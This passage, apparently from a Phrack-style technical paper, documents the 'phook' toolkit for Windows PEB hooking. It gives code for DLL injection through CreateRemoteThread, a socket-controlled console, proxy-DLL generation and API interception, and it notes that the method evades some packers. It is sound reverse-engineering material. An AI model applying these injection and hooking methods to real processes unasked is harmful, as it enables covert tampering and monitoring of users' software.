+                                   |    | ...                         |  |
+                                   |    +-----------------------------+  |
+                                   +-------------------------------------+
+
+As it can be observed the flow passes first through DLL_FAKE. Then
+DLL_FAKE calls to the original LoadLibrary (DLL_REAL).
+
+
+------[ 3.5 - Starting execution
+
+Once all the previous steps are done it is the moment for beginning to
+execute the process and to see if everything works.
+
+
+------[ 3.6 - The APIs that work with modules
+
+The APIs LoadLibrary, GetModuleHandle, EnumProcessModules [R.12] ... use
+the field LoaderData from the PEB [T.1]. This means that everytime that
+they try something against DLL_REAL they will be interacting with
+DLL_FAKE, for example:
+
+PEB HOOKING [T.1] has been done to USER32.DLL:
+    - DLL_FAKE
+        - Name in memory:    USER32.DLL
+        - BaseAddress:       00435622
+    - DLL_REAL
+        - Name in memory:    OLD_U32.DLL
+        - BaseAddress:       77D10000
+
+The process tries to obtain the base of USER32.DLL:
+    - HMODULE user32 = GetModuleHandle( "user32.dll" );
+
+After executing GetModuleHandle [R.12] the variable user32 will contain:
+00435622 (BaseAddress of DLL_FAKE). If the process does later a
+GetProcAddress [R.12] on some function exported by USER32.DLL, it will
+obtain the function of DLL_FAKE.
+
+Thanks to PEB HOOKING [T.1] it is no longer necessary to change the
+behaviour of the APIs that work with modules so that they use DLL_FAKE.
+
+
+------[ 3.7 - A new concept: DLL MINIFILTER
+
+DLL MINIFILTER is the name that we have given to the capacity by which a
+call to an exportation can pass through several DLL_FAKE. One of the most
+importtant advantages of the method is to extend or to limit the
+functionalities modularly to the call of an exportation.
+
+When PEB HOOKING [T.1] is done over a DLL_FAKE, the term DLL_REAL for the
+new DLL_FAKE becomes the previous DLL_FAKE, creating
+While doing PEB HOOKING [T.1] over DLL_FAKE, the DLL_REAL term for the new 
+DLL_FAKE, became the before  DLL_FAKE value, creating therefore a stack of 
+DLL_FAKEs. The flow will go form the last DLL_FAKE, of which PEB HOOKING 
+[T.1] has taken control, to the DLL_REAL, in case that all the DLL_FAKEs 
+call to the original export.
+
+Flow of a call of a proceso, with PEB HOOKING [T.1], with just one
+DLL_FAKE:
+           0              1
+[process] --> [DLL_FAKE] --> [DLL_REAL]
+    ^                            |
+    |             2              |
+    +----------------------------+
+
+Flow of a call of a process, with PEB HOOKING [T.1], with three DLL_FAKEs:
+           0                1                2                3
+[process] --> [DLL_FAKE 3] --> [DLL_FAKE 2] --> [DLL_FAKE 1] --> [DLL_REAL]
+    ^                                                               |
+    |                               4                               |
+    +---------------------------------------------------------------+
+
+In the previous examples, all the DLL_FAKEs pass the control to the
+corresponding DLL_REAL.
+
+
+------[ 3.8 - Frequent problems
+
+
+At the time of realizing PEB HOOKING [T.1] certain problems may happen,
+next a table with the problems and the possible solutions is shown:
+
++-------------------------------------------------------------------------+
+| Problem                       | Possible/s Solution/s                   |
+|-------------------------------+-----------------------------------------|
+| - The PEB HOOKING [T.1] fails | - Check if the necessary fields of the  |
+|                               |   PEB [T.1] can be exchanged.           |
+|                               | - Check if the correct permissions to   |
+|                               |   change the needed IATs [R.3] are      |
+|                               |   present.                              |
+|-------------------------------+-----------------------------------------|
+| - The execution of a process  | - Check that the PEB [R.1] is browsed   |
+|   fails                       |   correctly.                            |
+|                               | - Check if the IATs [R.3] of all the    |
+|                               |   modules of the process have been      |
+|                               |   correctly browsed.                    |
+|                               | - check if the modified permissions in  |
+|                               |   memory in the PEB HOOKING [T.1] have  |
+|                               |   been restored.                        |
++-------------------------------------------------------------------------+
+
+
+------[ 4.- phook
+
+phook is capable of realizing PEB HOOKING [T.1] (and other things) in a
+simple manner. phook is a project of various modules:
+    
+    - InjectorDLL: Program that creates a suspended process and injects a
+                   DLL in it.
+    
+    - Console Control: DLL that is injected in the process where we want to
+                       do PEB HOOKING [T.1]. It allows to do PEB HOOKING
+                       [T.1] and other tasks interactively by means of a
+                       command console by sockets.
+    
+    - CreateExp: Program that generates from a DLL_REAL the source code
+                 needed to realize a DLL_FAKE.
+    
+    - ph_ker32.dll: DLL_FAKE of kernel32.dll. ph_ker32.dll monotorizes the
+                    access to the APIs: CreateFileA and CreateFileW [R.14].
+
+
+------[ 4.1 - InjectorDLL
+
+Program that creates a suspended process and injects a DLL into it. To 
+inject the DLL C:\console.dll in the corresponding process C:\poc.exe:
+    - To specify the type of process:
+        - CONSOLE:
+            - InjectorDLL.exe C:\console.dll -c C:\poc.exe
+        - GUI:
+            - InjectorDLL.exe C:\console.dll -g C:\poc.exe
+    - Not to specify the type of process
+        - InjectorDLL.exe C:\console.dll -u C:\poc.exe
+
+InjectorDLL, with the parameter -u, usually detects if a process is GUI or
+Console to know how to create it suspended (see section 2.3). The method
+that we have created consists in creating the process with the API
+CreateProcess and the flag CREATE_SUSPENDED [R.6]. Later WaitForInputIdle 
+is called, if the wait fails then it is a Console process, otherwise it 
+will be GUI.
+
+    ------[ CODE
+    
+    CreateProcess
+    (  
+        program_name                          ,
+        NULL                                  ,
+        NULL                                  ,
+        NULL                                  ,
+        FALSE                                 ,
+        CREATE_SUSPENDED | CREATE_NEW_CONSOLE ,
+        NULL                                  ,
+        NULL                                  ,
+        pstart_inf                            ,
+        ppro_inf
+    )
+    
+    // It is necessary to check the correct creation of the process
+    
+    if ( WaitForInputIdle( ppro_inf->hProcess, 0 ) == WAIT_FAILED )
+        // "Console process"
+    else
+        // "GUI process"
+    
+    ------[ END CODE
+
+Once the type of process is known, we already know how to create it
+suspended correctly (see section 2.3).
+
+Note: the method may not always work, in some ocassion a
+      "Console process" will be detected as "GUI process".
+
+The code that loads the DLL is put in a structure called LOADER_DLL_s
+(see section 2.3). LOADER_DLL_s is loaded with the instructions in
+assembler and the needed data. It is necessary to write in the created
+process the structure LOADER_DLL_s and to call to CreateRemoteThread, 
+giving it as entrypoint the start of the structure, so that the code of 
+LOADER_DLL_s is executed.
+
+Once the DLL is loaded, the thread is suspended from which LOADER_DLL_s is 
+being executed and increments a flag to indicate it.
+
+    ------[ CODE
+    
+    typedef struct LOADER_DLL_s
+    {
+        /* - CODE ------------------------------------------------------ */
+        PUSH_ASM_t      push_name_dll;           /* PUSH "DLL_INJECT.DLL"*/
+        CALL_ASM_t      call_load_library;       /* CALL  LoadLibraryA   */
+        
+        CALL_ASM_t      call_get_current_thread; /* CALL GetCurrentThread*/
+        INC_BYTE_MEM_t  inc_flag;                /* INC [FLAG]           */
+        char            PUSH_EAX;                /* PUSH EAX             */
+        CALL_ASM_t      call_suspendthread;      /* CALL SuspendThread   */
+        
+        /* - DATA ------------------------------------------------------ */
+        char            name_dll[MAX_PATH];      /* DLL_INJECT.DLL'\0'   */
+        char            flag;                    /* [FLAG]               */
+        
+    } LOADER_DLL_t;
+    
+    ------[ END CODE
+
+
+------[ 4.2 - Console Control
+
+Console Control is the DLL that is injected in the process in which it is
+wanted  to realize PEB HOOKING [T.1]. It allows to make PEB HOOKING [T.1]
+and other tasks interactively by means of a command console by sockets. The
+port that listens writes it in the file C:\ph_listen_ports.log, with the
+nomenclature PID - PORT. Example of a process with PID 2456,
+listening in the port 1234: 2456 - 1234.
+
+At the moment you have the following list of commands:
+    help                      - Shows this screen
+    exit                      - Closes and unloads the console
+    suspend                   - Pauses the execution of the program
+    resume                    - Resumes the execution of the program
+    showmodules               - Shows the list of modules
+    load [param1]             - Loads in memory the specified library
+                                in [param1]
+    unload [param1]           - Unloads a library specified in memory in
+                                [param1]
+    pebhook [param1] [param2] - Realizes PEB HOOKING [T.1] over a dll
+                                [param1]: Name of the original dll
+                                [param2]: Path to the DLL_FAKE
+
+It is easy to understand each of the commands that our console admits, so
+we will explain how "showmodules", "pebhook" and "suspend" work.
+
+The commando "showmodules" does a search in the PEB [R.1] of the loaded
+modules without using APIs.
+
+pebhook is the command that realizes all the process of PEB HOOKING  (see
+section 3).
+
+If PEB HOOKING [T.1] over kernel32.dll is wanted to be done, using as
+DLL_FAKE "C:\phook\bin\windows_xp_sp2\ph_ker32.dll", for the OS Windows
+XP SP2, only it is necessary to send the command:
+    - pebhook kernel32.dll c:\phook\bin\windows_xp_sp2\ph_ker32.dll
+
+The command suspend is capable of suspending the execution of the main
+thread of the process. The TID of the main thread is obtained browsing
+the THREADENTRY32 [R.13] of the system till it reaches the first of
+the process:
+    
+    ------[ CODE
+    
+    BOOL GetMainThreadId( DWORD * thread_id )
+    {
+        HANDLE        hThreadSnap;
+        THREADENTRY32 th32;
+        BOOL          return_function;
+        DWORD         process_id;
+        
+        process_id      = GetCurrentProcessId();
+        hThreadSnap     = INVALID_HANDLE_VALUE;
+        return_function = FALSE;
+    
+        hThreadSnap = \
+            CreateToolhelp32Snapshot( TH32CS_SNAPTHREAD, process_id );
+        
+        if( hThreadSnap == INVALID_HANDLE_VALUE )
+        {
+            ShowGetLastErrorString
+                ( " GetMainThreadId() - CreateToolhelp32Snapshot()" );
+            return FALSE;
+        }
+        
+        th32.dwSize = sizeof( THREADENTRY32 );
+        if( !Thread32First( hThreadSnap, & th32 ) )
+            ShowGetLastErrorString( "GetMainThreadId() - Thread32First()");
+        
+        do
+        {
+            if ( th32.th32OwnerProcessID == process_id )
+            {
+                * thread_id     = th32.th32ThreadID;
+                return_function = TRUE;
+            }
+            
+        }
+        while
+        (
+            Thread32Next( hThreadSnap, & th32 ) && return_function != TRUE
+        );
+        
+        CloseHandle( hThreadSnap );
+        
+        return return_function;
+    }
+    
+    ------[ END CODE
+
+ 
+------[ 4.3 - CreateExp
+
+CreateExp is a program that generates the source code needed to realize a
+DLL_FAKE from a DLL_REAL. At the moment it creates the files .c and .def,
+to use with mingw.
+
+To create a DLL_FAKE of kernel32.dll it is needed to execute:
+    - CreateExp C:\WINDOWS\SYSTEM32\KERNEL32.DLL C:\ph_ker32
+
+If it has worked well the files C:\ph_ker32.c and C:\ph_ker32.def will
+be created.
+
+ph_ker32.c contains the definitions of the exportations of kernel32.dll
+and jumps automatically to the originals.
+
+ph_ker32.def contains the alias and the names of the exportations of
+kernel32.dll.
+
+By default the exportations of DLL_FAKE will jump to the corresponding
+exportation of DLL_REAL.
+
+
+------[ 4.3.1 - Forwarder DLL
+
+CreateExp tranforms the Forwarder DLL [R.3] into exportations, so
+PEB HOOKING of a function Forwarder can be done.
+
+Example: kernel32.dll has as Forwarder HeapAlloc that goes to the
+         exportation RtlAllocateHeap of NTDL.DLL. When a module imports
+         HeapAlloc from kernel32.dll, the Loader of win32 automatically
+         puts the address of the exportation of NTDLL.DLL and never
+         passes through kernel32.dll:
+
+                    CALL HeapAlloc
+        [process] ------------------> [NTDLL.DLL]
+            ^               0               |
+            +-------------------------------+
+                            1
+            
+If a DLL_FAKE of kernel32.dll is created with CreateExp, the flow will be:
+   
+            CALL HeapAlloc      (DLL_FAKE)
+[process] ------------------> [KERNEL32.DLL] --------> [NTDLL.DLL]
+    ^              0                            1         | 
+    +-----------------------------------------------------+
+                             2
+                             
+Of such form that we can implement a hook of HeapAlloc (kernel32.dll).
+
+
+------[ 4.4 - ph_ker32.dll
+
+ph_ker32.dll was created to do PEB HOOKING [T.1] to kernel32.dll;
+monotorizes the access to the APIs "CreateFileA" and "CreateFileW" [R.14],
+and when it is called to any other automatically it jumps to the original.
+
+In order to easen the jump to an API a JMP macro has been created, it has
+to pass the name of the DLL and the ordinal of the exportation (to see the
+JMP macro see section 4.4.2).
+
+ph_ker32.c created with CreateExp (JMP macro has been omitted):
+    
+    ------[ CODE
+    
+    #define FAKE_LIB "ph_ker32.dll"
+
+    DLLEXPORT void _ActivateActCtx ( void )
+    {
+        JMP( FAKE_LIB, 1 );
+    }
+    
+    DLLEXPORT void _AddAtomA ( void )
+    {
+        JMP( FAKE_LIB, 2 );
+    }
+    
+    DLLEXPORT void _AddAtomW ( void )
+    {
+        JMP( FAKE_LIB, 3 );
+    }
+    
+    DLLEXPORT void _AddConsoleAliasA ( void )
+    {
+        JMP( FAKE_LIB, 4 );
+    } 
+    ....
+    
+    ------[ END CODE
+    
+
+    It is necessary to remember that once PEB HOOKING [T.1] has been made,
+    kernel32.dll will now be named ph_ker32.dll, for that reason
+    ph_ker32.dll in the symbolic constant FAKE_LIB is indicated. 
+
+    ph_ker32.def created with CreateExp:
+
+    ------[ CODE
+    
+    LIBRARY    default
+    EXPORTS    
+    ActivateActCtx=_ActivateActCtx           @ 1
+    AddAtomA=_AddAtomA                       @ 2
+    AddAtomW=_AddAtomW                       @ 3
+    ...
+    
+    ------[ END CODE
+
+
+    By reasons of clarity the implementation of the APIs CreateFileA and
+    CreateFileW [R.14] have been put in the file owns.c. When a call is
+    made to CreateFileA and to CreateFileW [R.14] it is written the
+    parameter lpFileName in the file C:\CreateFile.log
+    
+    owns.c:
+            
+    ------[ CODE
+    
+    #define FILE_LOG C:\CreateFile.log
+    
+    DLLEXPORT
+    HANDLE _stdcall _CreateFileW
+    (
+        LPCWSTR lpFileName,
+        DWORD dwDesiredAccess,
+        DWORD dwShareMode,
+        LPSECURITY_ATTRIBUTES lpSecurityAttributes,
+        DWORD dwCreationDistribution,
+        DWORD dwFlagsAndAttributes,
+        HANDLE hTemplateFile
+    )
+    {
+        char   asc_str[MAX_PATH];
+        
+        if ( UnicodeToANSI( (WCHAR *) lpFileName, asc_str ) == 0 )
+            CreateFileLogger( asc_str );
+        
+        return CreateFileW( 
+            lpFileName,
+            dwDesiredAccess,
+            dwShareMode,
+            lpSecurityAttributes,
+            dwCreationDistribution,
+            dwFlagsAndAttributes,
+            hTemplateFile );
+    }
+    
+    DLLEXPORT
+    HANDLE _stdcall _CreateFileA
+    (
+        LPCSTR lpFileName,
+        DWORD dwDesiredAccess,
+        DWORD dwShareMode,
+        LPSECURITY_ATTRIBUTES lpSecurityAttributes,
+        DWORD dwCreationDistribution,
+        DWORD dwFlagsAndAttributes,
+        HANDLE hTemplateFile
+    )
+    {
+        char   asc_str[MAX_PATH];
+        
+        CreateFileLogger( lpFileName );
+        
+        return CreateFileA(
+            lpFileName,
+            dwDesiredAccess,
+            dwShareMode,
+            lpSecurityAttributes,
+            dwCreationDistribution,
+            dwFlagsAndAttributes,
+            hTemplateFile );
+    }
+    
+    static void
+    CreateFileLogger( const char * file_to_log )
+    {
+        HANDLE file;
+        DWORD  chars;
+        
+        file = \
+            CreateFileA
+            (
+                FILE_LOG                            ,
+                GENERIC_WRITE    | GENERIC_READ     ,
+                0                                   ,
+                NULL                                ,
+                OPEN_ALWAYS                         ,
+                0                                   ,
+                NULL
+            );
+            
+        if ( file != INVALID_HANDLE_VALUE )
+        {        
+            if ( SetFilePointer( file, 0, NULL, FILE_END ) != -1 )
+            {
+                WriteFile
+                (
+                    file, file_to_log, strlen( file_to_log ), &chars, NULL
+                );
+                WriteFile( file, "\x0D\x0A", 2, &chars, NULL );
+            }
+            CloseHandle( file );
+        }
+    }
+    
+    ------[ END CODE
+
+
+------[ 4.4.1 - Stack problems
+
+When it is wanted to directly pass the control to an API which prototype
+is not known a generic form, it is necessary to pass it the intact stack
+to the original API. This is gotten in mingw with the option of the
+compilator -fomit-frame-pointer [R.15] and a JMP (ASM) to the original
+API.
+
+The functions that have been implemented have to be put in the prototype
+and must be of the type _stdcall. The functions of type _stdcall have a
+different syntax in the file .def:
+    - Name_exportation=Alias@arguments * 4   @ Ordinal
+
+Example of file .def with the APIs of type _stdcall CreateFileA and
+CreateFileW [R.14] (both have seven arguments):
+    
+    ------[ CODE
+    
+    LIBRARY    ph_ker32
+    EXPORTS
+    
+    ; Name Exp | Alias      | No Args * 4    | Ordinal Windows XP SP2
+    CreateFileW=_CreateFileW@28              @ 83
+    CreateFileA=_CreateFileA@28              @ 80
+    
+    ------[ END CODE
+
+The functions of type _stdcall should not be compiled with
+-fomit-frame-pointer [R.15] option.
+
+
+------[ 4.4.2 - Registry problems
+
+Not only is necessary to pass the stack intact to an exportation, some
+times the exportations directly use the values of the registers. Before
+passing the control to the original exportation it is necessary to let the
+registers intact, this is accomplished inserting in the code the
+instructions PUSHAD and POPAD:
+    [PUSHAD] [ CODE NEEDED TO JUMP TO THE EXPORTATION ] [POPAD]
+
+An example of exportation that directly uses the registers is _chkstk of
+NTDLL.DLL:
+
+_chkstk in NTDLL.DLL (WINDOWS XP SP2):
+    
+    ------[ CODE
+    
+    7C911A09 >/$ 3D 00100000    CMP EAX,1000
+    7C911A0E  |. 73 0E          JNB SHORT ntdll.7C911A1E
+    7C911A10  |. F7D8           NEG EAX
+    7C911A12  |. 03C4           ADD EAX,ESP
+    7C911A14  |. 83C0 04        ADD EAX,4
+    7C911A17  |. 8500           TEST DWORD PTR DS:[EAX],EAX
+    7C911A19  |. 94             XCHG EAX,ESP
+    7C911A1A  |. 8B00           MOV EAX,DWORD PTR DS:[EAX]
+    7C911A1C  |. 50             PUSH EAX
+    7C911A1D  |. C3             RETN
+    7C911A1E  |> 51             PUSH ECX
+    7C911A1F  |. 8D4C24 08      LEA ECX,DWORD PTR SS:[ESP+8]
+    7C911A23  |> 81E9 00100000  /SUB ECX,1000
+    7C911A29  |. 2D 00100000    |SUB EAX,1000
+    7C911A2E  |. 8501           |TEST DWORD PTR DS:[ECX],EAX
+    7C911A30  |. 3D 00100000    |CMP EAX,1000
+    7C911A35  |.^73 EC          \JNB SHORT ntdll.7C911A23
+    7C911A37  |. 2BC8           SUB ECX,EAX
+    7C911A39  |. 8BC4           MOV EAX,ESP
+    7C911A3B  |. 8501           TEST DWORD PTR DS:[ECX],EAX
+    7C911A3D  |. 8BE1           MOV ESP,ECX
+    7C911A3F  |. 8B08           MOV ECX,DWORD PTR DS:[EAX]
+    7C911A41  |. 8B40 04        MOV EAX,DWORD PTR DS:[EAX+4]
+    7C911A44  |. 50             PUSH EAX
+    7C911A45  \. C3             RETN
+
+    ------[ END CODE
+
+
+------[ 4.4.3 - The JMP macro
+
+The JMP macro is necessary since not always all the DLL (file .h)
+declarations are had in its header. With the JMP macro the address of
+the exportation is obtained with GetProcAddress [R.12] in runtime.
+
+    ------[ CODE
+
+    unsigned long tmp;
+    
+    #define JMP( lib, func )        \
+       asm ( "pushad" );           \
+       asm                           \
+       (                             \
+           " push edx             \n"      \
+           " push %1              \n"      \
+           " call eax             \n"      \
+           " pop edx              \n"      \
+           " push %2              \n"      \
+           " push eax             \n"      \
+           " call edx             \n"      \
+           " mov %4, eax          \n"      \
+           " popad                \n"      \
+                                              \
+           : :                                \
+           "a" (GetModuleHandle) ,         \
+           "g" (lib)             ,         \
+           "g" (func)            ,         \
+           "d" (GetProcAddress)  ,         \
+           "g" (tmp)                       \
+        );                                   \
+       asm ( "jmp %0" : : "g" (tmp) );
+
+    ------[ END CODE
+
+The code is for mingw [R.16] with the compiler option -masm=intel.
+
+
+------[ 4.4.4 - Versions
+
+We have included in phook various versions of ph_ker32 for the systems:
+
+    - Windows XP SP2         v5.1.2600
+    - Windows Server 2003 R2 v5.2.3790
+    - Windows Vista          v6.0.6000
+
+Source code in ph_ker32/SO and binaries in bin/OS.
+
+
+------[ 4.5 - Using phook
+
+Lets imagine that we want to do PEB HOOKING [T.1] to kernel32.dll with
+ph_ker32.dll, the programa poc.exe has been chosen for the example (comes
+in the folder bin\ of phook).
+
+Steps to follow:
+
+1.- Execute InjectorDLL indicating a program to execute and the DLL of the
+    console that will be injected in the process:
+        - InjectorDLL.exe console.dll -u poc.exe
+    The process will be hold in suspended state and there will be a socket
+    listening in the port indicated in the file C:\ph_listen_ports.log
+    
+        C:\phook\bin>InjectorDll.exe console.dll -u poc.exe
+          ________________________________________________________________
+         |                       InjectorDLL v1.0                         |
+         |                                                                |
+         | [Shearer]   eunimedesAThotmail.com                             |
+         | Dreg        DregATfr33project.org                              |
+         | -------------------------------------------------------------- |
+         |                   http://www.fr33project.org                   |
+         |________________________________________________________________|
+        
+         Showing injection data .....
+             Program to inject : poc.exe
+             Library to inject: console.dll
+        
+         [OK]   - CONSOLE.
+         [OK]   - Create process:
+             [INFO] PID:       0x0960
+             [INFO] P. HANDLE: 0x000007B8
+             [INFO] TID:       0x0AE0
+             [INFO] T. HANDLE: 0x000007B0
+         [INFO] - Injecting DLL...
+             [OK]   - Allocate memory in the extern process.
+             [INFO] - Address reserved on the other process: 0x00240000
+             [INFO] - Space requested: 306
+             [OK]   - Creating structure for the dll load.
+             [OK]   - Writing structure for the dll load.
+             [OK]   - Creating remote thread.
+             [INFO] - Thread created with TID: 0x0B28
+             [INFO] - Attempt: 1
+             [INFO] - Thread has entered suspension mode.
+             [OK]   - Injection thread ended.
+             [OK]   - Memory in remote thread freed.
+         [OK]   -  DLL injected.
+        
+         [OK]   -  Injection ended.
+
+2.- It is necessary to connect with a client of type netcat to the open
+    port, in this case: 1234.
+    
+    C:\>nc 127.0.0.1 1234
+      ________________________________________________________________
+     |                        Phook Prompt v1.0                       |
+     | [Shearer]   eunimedesAThotmail.com                             |
+     | Dreg        DregATfr33project.org                              |
+     | -------------------------------------------------------------- |
+     |                   http://www.fr33project.org                   |
+     |________________________________________________________________|
+    
+    
+     ph > help
+      _________________________________________________________________
+     |                       Phook Prompt v1.0                         |
+     |                                                                 |
+     | Command list:                                                   |
+     | --------------------------------------------------------------- |
+     | help                      - Shows this screen                   |
+     | exit                      - Closes and unloads the console      |
+     | suspend                   - Pauses the programs execution       |
+     | resume                    - Resumes the programs execution      |
+     | showmodules               - Shows the modules list              |
+     | load [param1]             - Loads in memory the library         |
+     |                             especified in [param1]              |
+     | unload [param1]           - Unloads a librery in memory         |
+     |                             especified in [param1]              |
+     | pebhook [param1] [param2] - Performs PEB Hook over a dll        |
+     |                             [param1]: Name of the original dll  |
+     |                             [param2]: Path to the DLL hook      |
+     |_________________________________________________________________|
+
+3.- PEB HOOKING [T.1] to kernel32.dll is realized with the ph_ker32.dll:
+    ph > pebhook kernel32.dll C:\phook\bin\windows_xp_sp2\ph_ker32.dll
+
+4.- The command resume is sent so that the execution of the process
+    begins.
+    
+    ph > resume
+    ph > 
+    C:\phook\bin> 
+
+5.- poc.exe creates the files in C:\
+    - file
+    - file2
+    - file3
+
+6.- ph_ker32.dll registers the successful calls to the APIs CreateFileA
+    and CreateFileW [R.14] in the file C:\CreateFile.log
+
+7.-
+    C:\>more CreateFile.log
+    
+    C:\file1
+    C:\file2
+    C:\file3
+    
+    
+------[ 4.5.1 - DLL MINIFILTER
+
+phook allows to realize DLL MINIFILTER (see section 3.7) by a simple
+manner. It only has to realize PEB HOOKING [T.1], with the command
+pebhook, over the name of the DLL_FAKE, that is the one that had
+DLL_REAL.
+
+Supposing that we have two DLL_FAKEs:
+    - ph_ker32_1.dll: Monotorizes access to the APIs CreateFile [R.14].
+    - ph_ker32_2.dll: Monotorizes the access of the API ReadFile [R.17].
+
+To do DLL MINIFILTER it is as easy as:
+    
+    C:\>nc 127.0.0.1 1234
+      ________________________________________________________________
+     |                        Phook Prompt v1.0                       |
+     | [Shearer]   eunimedesAThotmail.com                             |
+     | Dreg        DregATfr33project.org                              |
+     | -------------------------------------------------------------- |
+     |                   http://www.fr33project.org                   |
+     |________________________________________________________________|
+    
+    
+     ph > pebhook kernel32.dll C:\phook\bin\windows_xp_sp2\ph_ker32_1.dll
+     ph > pebhook kernel32.dll C:\phook\bin\windows_xp_sp2\ph_ker32_2.dll
+
+Flow of a call of the process to kernel32.dll:
+               0                    1                   2
+    [process] --> [ph_ker32_2.dll] --> [ph_ker32_2.dll] -> [kernel32.dll]
+        ^                                                      |
+        |                          3                           |
+        +------------------------------------------------------+
+     
+
+------[ 4.6 - Frequent problems
+
+Besides of the problems in the section 3.8, there are others:
+
++-------------------------------------------------------------------------+
+| Problem                       | Possible/s Solution/s                   |
+|-------------------------------+-----------------------------------------|
+| - DLL_FAKE compilation fails  | - Check that the functions that go      |
+|                               |   directly to DLL_REAL are not repeated |
+|                               |   and are implemented.                  |
+|                               | - Check that the implemented functions  |
+|                               |   (that must be of _stdcall type) are   |
+|                               |   well defined in the .def file         |
+|                               |   (see section 4.4.1).                  |
+|-------------------------------+-----------------------------------------|
+| - The execution of the        | - Check that the functions that go      |
+|   process fails               |   directly to DLL_REAL have been        |
+|                               |   compiled with the option              |
+|                               |   -fomit-frame-pointer (see section     |
+|                               |    4.4.1).                              |
+|                               | - Check that the implemented functions  |
+|                               |   are of _stdcall type.                 |
+|                               | - Check that DLL_FAKE have been created |
+|                               |   from the DLL_REAL and not another.    |
+|                               | - Check if InjectorDLL has correctly    |
+|                               |   detected the real type of the process |
+|                               |   (GUI or CONSOLE).                     |
+|-------------------------------+-----------------------------------------|
+| - It is not possible to       | - Check that the port 1234 is open      |
+|   connect to the console      |   before doing PEB HOOKING [T.1].       |
+|                               | - Check firewall blockings...           |
+|                               | - Check that the full path of           |
+|                               |   console.dll has been indicated in     |
+|                               |   InjectorDLL.                          |
+|-------------------------------+-----------------------------------------|
+| - InjectorDLL does not work   | - Check that the privilegies to inject  |
+|                               |   a DLL were obtained                   |
+|                               |   (CreateRemoteThread..)                |
+|                               | - Check anti-virus blocking...          |
+|-------------------------------+-----------------------------------------|
+| - CreateExp does not work     | - Check that the path of DLL_REAL ia a  |
+|                               |   correct PE32 and that the EXPORT      |
+|                               |   DIRECTORY is not corrupted [R.3].     |
++-------------------------------------------------------------------------+
+
+Some other problems may exist due to programming and/or design failures.
+
+
+------[ 5.- TODO
+
+At the moment we are trying to:
+    - Realize PEB HOOKING [T.1] before the execution of:
+        - TLS Table and DLLMain [R.3].
+    - Create debug files and configuration for the console.
+        - Rules for the repair of IATs [R.4].
+        - customized list of listening ports.
+        - ...    
+    - Improve InjectorDLL:
+        - Automatic detection of "GUI process" and "Console process".
+      
+      
+------[ 6.- Testing
+
+Tests with phook in different versions of Windows and  other programs
+have been made.
+
+Windows:
+    - Windows XP SP2         v5.1.2600
+    - Windows Server 2003 R2 v5.2.3790
+    - Windows Vista          v6.0.6000
+
+And theoretically it would have to work in Windows 2000, but we have
+not verified it.
+
+Programs:
+    - Microsoft Word 10.0.2627.0
+    - Regedit        5.1.2600.2180
+    - Notepad        5.1.2600.2180
+    - Calc           5.1.2600.0
+    - CMD            5.1.2600.2180
+    - piathook       1.4
+    - pebtry         Beta 5
+    - pe32analyzer   Beta 2
+
+
+------[ 7.- Advantages and possibilities
+
+The biggest advantage of PEB HOOKING [T.1] over other hooking methods is
+that it only has to be applied once. At the moment that a hook to a DLL
+has been done, any module that is loaded will automatically have in his
+IAT [R.3] the exports that use DLL_FAKE. The rest of the modules have to
+apply the hook every time that the module is loaded.
+
+Other advantages of using PEB HOOKING [T.1]:
+    
+    - A search in the PEB (using the field BaseDllName) to find 
+      DLL_REAL, will arrive at DLL_FAKE.
+      
+    - PEB HOOKING is a more stable method for the OS than others in ring0.
+    
+    - Some packers do not detect PEB HOOKING [T.1] as it is not a well
+      documented method.
+    
+    - It is not necessary to change the behavior of the APIs that work
+      with modules. When a module tries to obtain the handler of the
+      DLL_REAL, will automatically obtain the handler DLL_FAKE.
+
+    - Possibility of creating DLL MINIFILTER (see section 3.7).
+    
+    - PEB HOOKING of a exportation Forwarder [R.3] can be done without
+      making PEB HOOKING to the Forwarder DLL.
+
+
+The spectrum of possibilities that the PEB HOOKING [T.1] method allows
+and phook is quite ample, next we raised some examples:
+    
+    - Monotorize/virtualize the access to the registry of a process.
+        - POC [R.18]:
+            1.- Use the tool CreateExp (see section 4.3) on
+                "advapi32.dll".
+            2.- Based on what is desired to do, it is necessary to
+                implement the monitorization/virtualization in the next
+                APIs:
+                - RegCloseKey
+                - RegCreateKeyA/RegCreateKeyW
+                - RegCreateKeyExA/RegCreateKeyExW
+                - RegDeleteKeyA/RegDeleteKeyW
+                - RegLoadKeyA/RegLoadKeyW
+                - RegOpenKeyA/RegOpenKeyW
+                - RegOpenKeyExA/RegOpenKeyExW
+                - RegQueryValueA/RegQueryValueW
+                - RegQueryValueExA/RegQueryValueExW
+                - RegReplaceKeyA/RegReplaceKeyW
+                - RegRestoreKeyA/RegRestoreKeyW
+                - RegSaveKeyA/RegSaveKeyW
+                - RegSaveKeyExA/RegSaveKeyExW
+                - RegSetValueA/RegSetValueW
+                - RegSetValueExA/RegSetValueExW
+                - RegUnLoadKeyA/RegUnLoadKeyW
+                ...
+    
+    - Monotorize/virtualize conections.
+        - POC [R.20]:
+            1.- Use the tool CreateExp (see section 4.3) on
+                "ws2_32.dll".
+            2.- Based on what is desired to do, it is necessary to
+                implement the monitorization/virtualization of the
+                following APIs:
+                - accept
+                - bind
+                - closesocket
+                - connect
+                - listen
+                - recv
+                - recvfrom
+                - send
+                - sendto
+                - socket
+                - WSAAccept
+                - WSAConnect
+                - WSARecv
+                - WSARecvFrom
+                - WSASend
+                - WSASendTo
+                - WSASocketA/W
+                ...
+    
+    - Syscall Proxy de ficheros:
+        - POC [R.19]:
+            1.- Use the tool CreateExp (see section 4.3) on
+                "kernel32.dll".
+            2.- Based on what is desired to do, it is necessary to
+                implement the redirection of the following APIs:
+                - CreateFileA/CreateFileW
+                - CreateFileExA/CreateFileExW
+                - ReadFile
+                - ReadFileEx
+                - WriteFile
+                - WriteFileEx
+                ...
+    
+    - ... and free your mind ;-)
+
+
+------[ 8.- Conclusion
+
+If it is necessary to do a hook to an API/exportation, any actual method
+may be used. But if it is necessary to monitorize or virtualize the access
+to various APIs/exportations with phook it is a lot simplier the
+implementation, as it is only necessary to program the functionality of the
+APIs/exportations.
+
+Besides, it is a method oriented to the reverse engineering of software and
+malware protection systems, as it difficults alternative methods of
+searching the exportations and elimination of hooks.
+      
+      
+------[ 9.- Acknowledgements
+
+Recommendations for the paper:
+    - phrack staff
+    - Tarako
+
+Translation to English of the chains of phook:
+    - Southern
+    - LogicMan
+    - XENMAX
+
+Translations of the paper to English:
+    - BETA  : Ana Hijosa
+    - BETA 2: delcoyote
+    - ACTUAL: LogicMan
+
+Virii scene:
+    - GriYo, zert, Slow, pluf, xezaw, sha0 ...
+
+Reversing scene:
